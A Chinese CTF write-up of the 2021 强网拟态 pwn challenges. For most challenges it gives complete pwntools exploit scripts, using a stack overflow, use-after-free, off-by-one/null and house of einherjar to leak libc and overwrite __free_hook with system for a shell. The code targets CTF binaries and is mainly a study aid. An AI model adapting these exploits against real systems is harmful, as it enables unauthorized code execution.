2021强网拟态复现

sonic

checksec一下

发现开了PIE和NX还有relro，这里比赛的时候本来想打ret2csu的。。好像是这个名字。。忘了

程序打印出了main的地址，开PIE后三位不变，所以打印出main地址后直接取除了后三位的其他位，在ida找后三位地址加上就行，然后就可以栈溢出getshell

from pwn import *
#r=remote('123.60.63.90',6890)
r = process('./sonic')
context(arch='amd64', os='linux')
r.recvuntil('main Address=0x')
main_addr = int(r.recv(12),16)
elf_base=main_addr-0x7CF
print hex(elf_base)
ret_addr=elf_base+0x8C4
backdoor=elf_base+0x73A
r.sendlineafter('login:',p64(0)*5+p64(ret_addr)+p64(backdoor))
r.interactive()
~                 

pwnpwn

栈溢出，给了canary，白给

random_heap

分配随机堆的大小
改写函数未见off by null和堆溢出
delete函数有uaf

那可以改fd为free_hook申请回来就可以改free_hook为后门了

from pwn import *
#r=remote('124.71.140.198',49153)
r = process('./random_heap')
libc=ELF('libc-2.27.so')
context(arch='amd64', os='linux')
context.log_level='debug'
def add(idx,size):
    r.sendlineafter('Your choice: ','1')
    r.sendlineafter('Index: ',str(idx))
    r.sendlineafter('Size: ',str(size))
def edit(idx,con):
    r.sendlineafter('Your choice: ','2')
    r.sendlineafter('Index: ',str(idx))
    r.sendafter('Content: ',con)
def show(idx):
    r.sendlineafter('Your choice: ','3')
    r.sendlineafter('Index: ',str(idx))
def delete(idx):
    r.sendlineafter('Your choice: ','4')
    r.sendlineafter('Index: ',str(idx))

add(0,0x100)
add(1,0x10)
for i in range(8):
    edit(0,0x10*'\x00')
    delete(0)
show(0)
libc.address=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-96-0x10-libc.sym['__malloc_hook']
add(2,0x20)
delete(2)
edit(2,p64(libc.sym['__free_hook'])+p64(0)+'\n')
while True:
    try:
        add(3,0x10)
        add(4,0x10)
        edit(4,p64(libc.sym['system'])+'\n')
        edit(3,'/bin/sh\x00'+'\n')
        delete(3)
        delete(4)
    except:
        r.interactive()

bitflip

alloc函数

edit函数中有off by one的漏洞

delete函数没有UAF

思路：shrink the chunk，unsorted bin泄露libc基址然后打free_hook

from pwn import *
r=process('./bitflip')
libc=ELF('libc-2.27.so')
context(arch='amd64', os='linux')
context.log_level='debug'
def add(idx,size):
    r.sendlineafter('Your choice: ','1')
    r.sendlineafter('Index: ',str(idx))
    r.sendlineafter('Size: ',str(size))
def edit(idx,con):
    r.sendlineafter('Your choice: ','2')
    r.sendlineafter('Index: ',str(idx))
    r.sendlineafter('Content: ',con)
def show(idx):
    r.sendlineafter('Your choice: ','3')
    r.sendlineafter('Index: ',str(idx))
def free(idx):
    r.sendlineafter('Your choice: ','4')
    r.sendlineafter('Index: ',str(idx))

for i in range(12):
    add(i,0x38)
for i in range(8):
    edit(i,0x38*'a'+'\xc1')
for i in range(8):
    free(i+1)

add(12,0x38)# cut from unsorted bin
show(9)
libc.address=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-96-0x10-libc.sym['__malloc_hook']
print hex(libc.address)
add(13,0x38)# cut from unsorted bin
free(13)#chunk13 is chunk9
edit(9,p64(libc.sym['__free_hook']))
add(14,0x38)#chunk13
add(15,0x38)#chunk9
edit(15,p64(libc.sym['system']))# change free_hook to system
edit(14,'/bin/sh\x00')
free(14)
r.interactive()

old_school

保护全开，不多说

off by one

from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
sh = process('./old_school')
libc = ELF('./libc-2.27.so')
#sh = remote('121.36.194.21', 49153)
def add(index, size):
    sh.sendlineafter('Your choice: ', '1')
    sh.sendlineafter('Index: ', str(index).encode())
    sh.sendlineafter('Size: ', str(size).encode())
def edit(index, content):
    sh.sendlineafter('Your choice: ', '2')
    sh.sendlineafter('Index: ', str(index).encode())
    sh.sendlineafter('Content: ', content)
def show(index):
    sh.sendlineafter('Your choice: ', '3')
    sh.sendlineafter('Index: ', str(index).encode())
def delete(index):
    sh.sendlineafter('Your choice: ', '4')
    sh.sendlineafter('Index: ', str(index).encode())

for i in range(2):
    add(i,0x18)

add(2,0x80)

for i in range(5):
    add(i+3,0x100)

edit(0,'a'*0x18+p8(0xf1))
delete(1)#overwrite the size of chunk1 to 0xf1
#then chunk1 overlap chunk2 and partial chunk3
add(8,0xe0)#chunk1 0xf1 size
edit(8,'b'*0x18+p64(0x4d1))#edit chunk2 size
delete(2)
add(9,0x100)#cuting from unsorted bin chunk2
show(9)
sh.recvuntil(b'Content: ')
libc_addr = u64(sh.recvn(6) + '\x00\x00') - 96-0x10-libc.symbols['__malloc_hook']
print hex(libc_addr)
delete(3)#free 0x100 chunk3
edit(9,'c'*0x80+p64(0)+p64(0x111)+p64(libc_addr+libc.symbols['__free_hook']))#chunk2 size:0x80
add(10, 0x100)#chunk3
add(11, 0x100)#free_hook
edit(11, b'/bin/sh\0' + p64(libc_addr + libc.symbols['system']))
delete(11)

sh.interactive()
#gdb.attach(sh)
#pause()

old_school_revenge

还是保护全开的

edit里面有个off by null
house of einherjar构成堆叠覆盖到之前free的tcache 0x100的chunk

from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
r  = process('./old_school_revenge')
libc = ELF('./libc-2.27.so')

def add(index, size):
    r.sendlineafter('Your choice: ', '1')
    r.sendlineafter('Index: ', str(index).encode())
    r.sendlineafter('Size: ', str(size).encode())
def edit(index, content):
    r.sendlineafter('Your choice: ', '2')
    r.sendlineafter('Index: ', str(index).encode())
    r.sendlineafter('Content: ', content)
def show(index):
    r.sendlineafter('Your choice: ', '3')
    r.sendlineafter('Index: ', str(index).encode())
def delete(index):
    r.sendlineafter('Your choice: ', '4')
    r.sendlineafter('Index: ', str(index).encode())

add(0,0xf8)
add(1, 0xf8)
delete(0)
delete(1)
add(1, 0xf8)
show(1)
r.recvuntil('Content: ')#show heap addr by using fd pointer
heap_addr = u64(r.recvn(6)+'\x00\x00') - 0x260
print hex(heap_addr)
add(0, 0xf8)
for i in range(8):
    add(i+2, 0xf8)# from chunk2 to chunk9
for i in range(5):
    delete(i+2)# delete chunk2 to chunk6

edit(7, 'a' * 0xf0 + p64(0x7f0))#overwrite prev_size
edit(0, p64(0) + p64(0x7f0) + p64(heap_addr + 0x260) + p64(heap_addr + 0x260))#bypass p->fd = p->bk
delete(7)
delete(1)
delete(8)

add(1, 0xe0)# In this step overlap
add(2, 0xe0)# leave main_arena+96
show(2)
r.recvuntil('Content: ')
libc_addr = u64(r.recvn(6) + '\x00\x00') - 96-0x10-libc.sym['__malloc_hook']
print hex(libc_addr)
edit(2,p64(libc_addr+libc.sym['__free_hook']))#the chunk2 is the chunk1 with 0x100 size that we free last
add(3,0xf8)#chunk2
add(4,0xf8)#free_hook
edit(4, b'/bin/sh\0' + p64(libc_addr + libc.sym['system']))
delete(4)
r.interactive()

#gdb.attach(r)
#pause()

bornote

patch掉jmp rax前一条db为nop
这样可以看到里面的函数了

2.31下的off by null

from pwn import *
import random
context.arch = 'amd64'
context.log_level = 'debug'
sh = process('./bornote')
libc = ELF('./libc-2.31.so')
#sh = remote('121.36.250.162', 49153)
def add(size):
    sh.sendlineafter('s cmd: ', '1')
    sh.sendlineafter(b'Size: ', str(size).encode())
def edit(index, content):
    sh.sendlineafter('s cmd: ', '3')
    sh.sendlineafter(b'Index: ', str(index).encode())
    sh.sendafter(b'Note: ', content)
def show(index):
    sh.sendlineafter('s cmd: ', '4')
    sh.sendlineafter('Index: ', str(index).encode())
def delete(index):
    sh.sendlineafter('s cmd: ', '2')
    sh.sendlineafter('Index: ', str(index).encode())
    
sh.sendlineafter('username: ','glibc2.31')
add(0x18)#0
add(0x18)#1
delete(0)
delete(1)
add(0x18)#chunk1 brefore but now it's index is 0
show(0)
sh.recvuntil('Note: ')
heap_addr = u64(sh.recvn(6) + '\x00\x00')
print hex(heap_addr)

add(0xf8)#1
add(0x28)#2
add(0x4f8)#3
add(0x38)#4 
edit(2,'a'*0x20+p64(0x120))
edit(1,p64(0)+p64(0x121)+p64(heap_addr+0x40)+p64(heap_addr+0x40)+'\n')
delete(3)
add(0x200)# cuting from chunk3 now it's chunk3
show(3)
sh.recvuntil('Note: ')
libc_addr = u64(sh.recvn(6) + '\0\0')- 96-0x10-libc.sym['__malloc_hook']
print hex(libc_addr)

add(0x28)#5 cutting from unsorted bin
delete(5)
delete(2)#chunk2->chunk5
edit(3, 'a' * 0xe0+p64(0)+p64(0x31) + p64(libc_addr + libc.sym['__free_hook']) + '\n')#edit chunk2 that

add(0x28)
add(0x28)
edit(5, b'/bin/sh\0' + p64(libc_addr + libc.sym['system']) + '\n')
delete(5)
#gdb.attach(sh)
#pause()

sh.ineractive()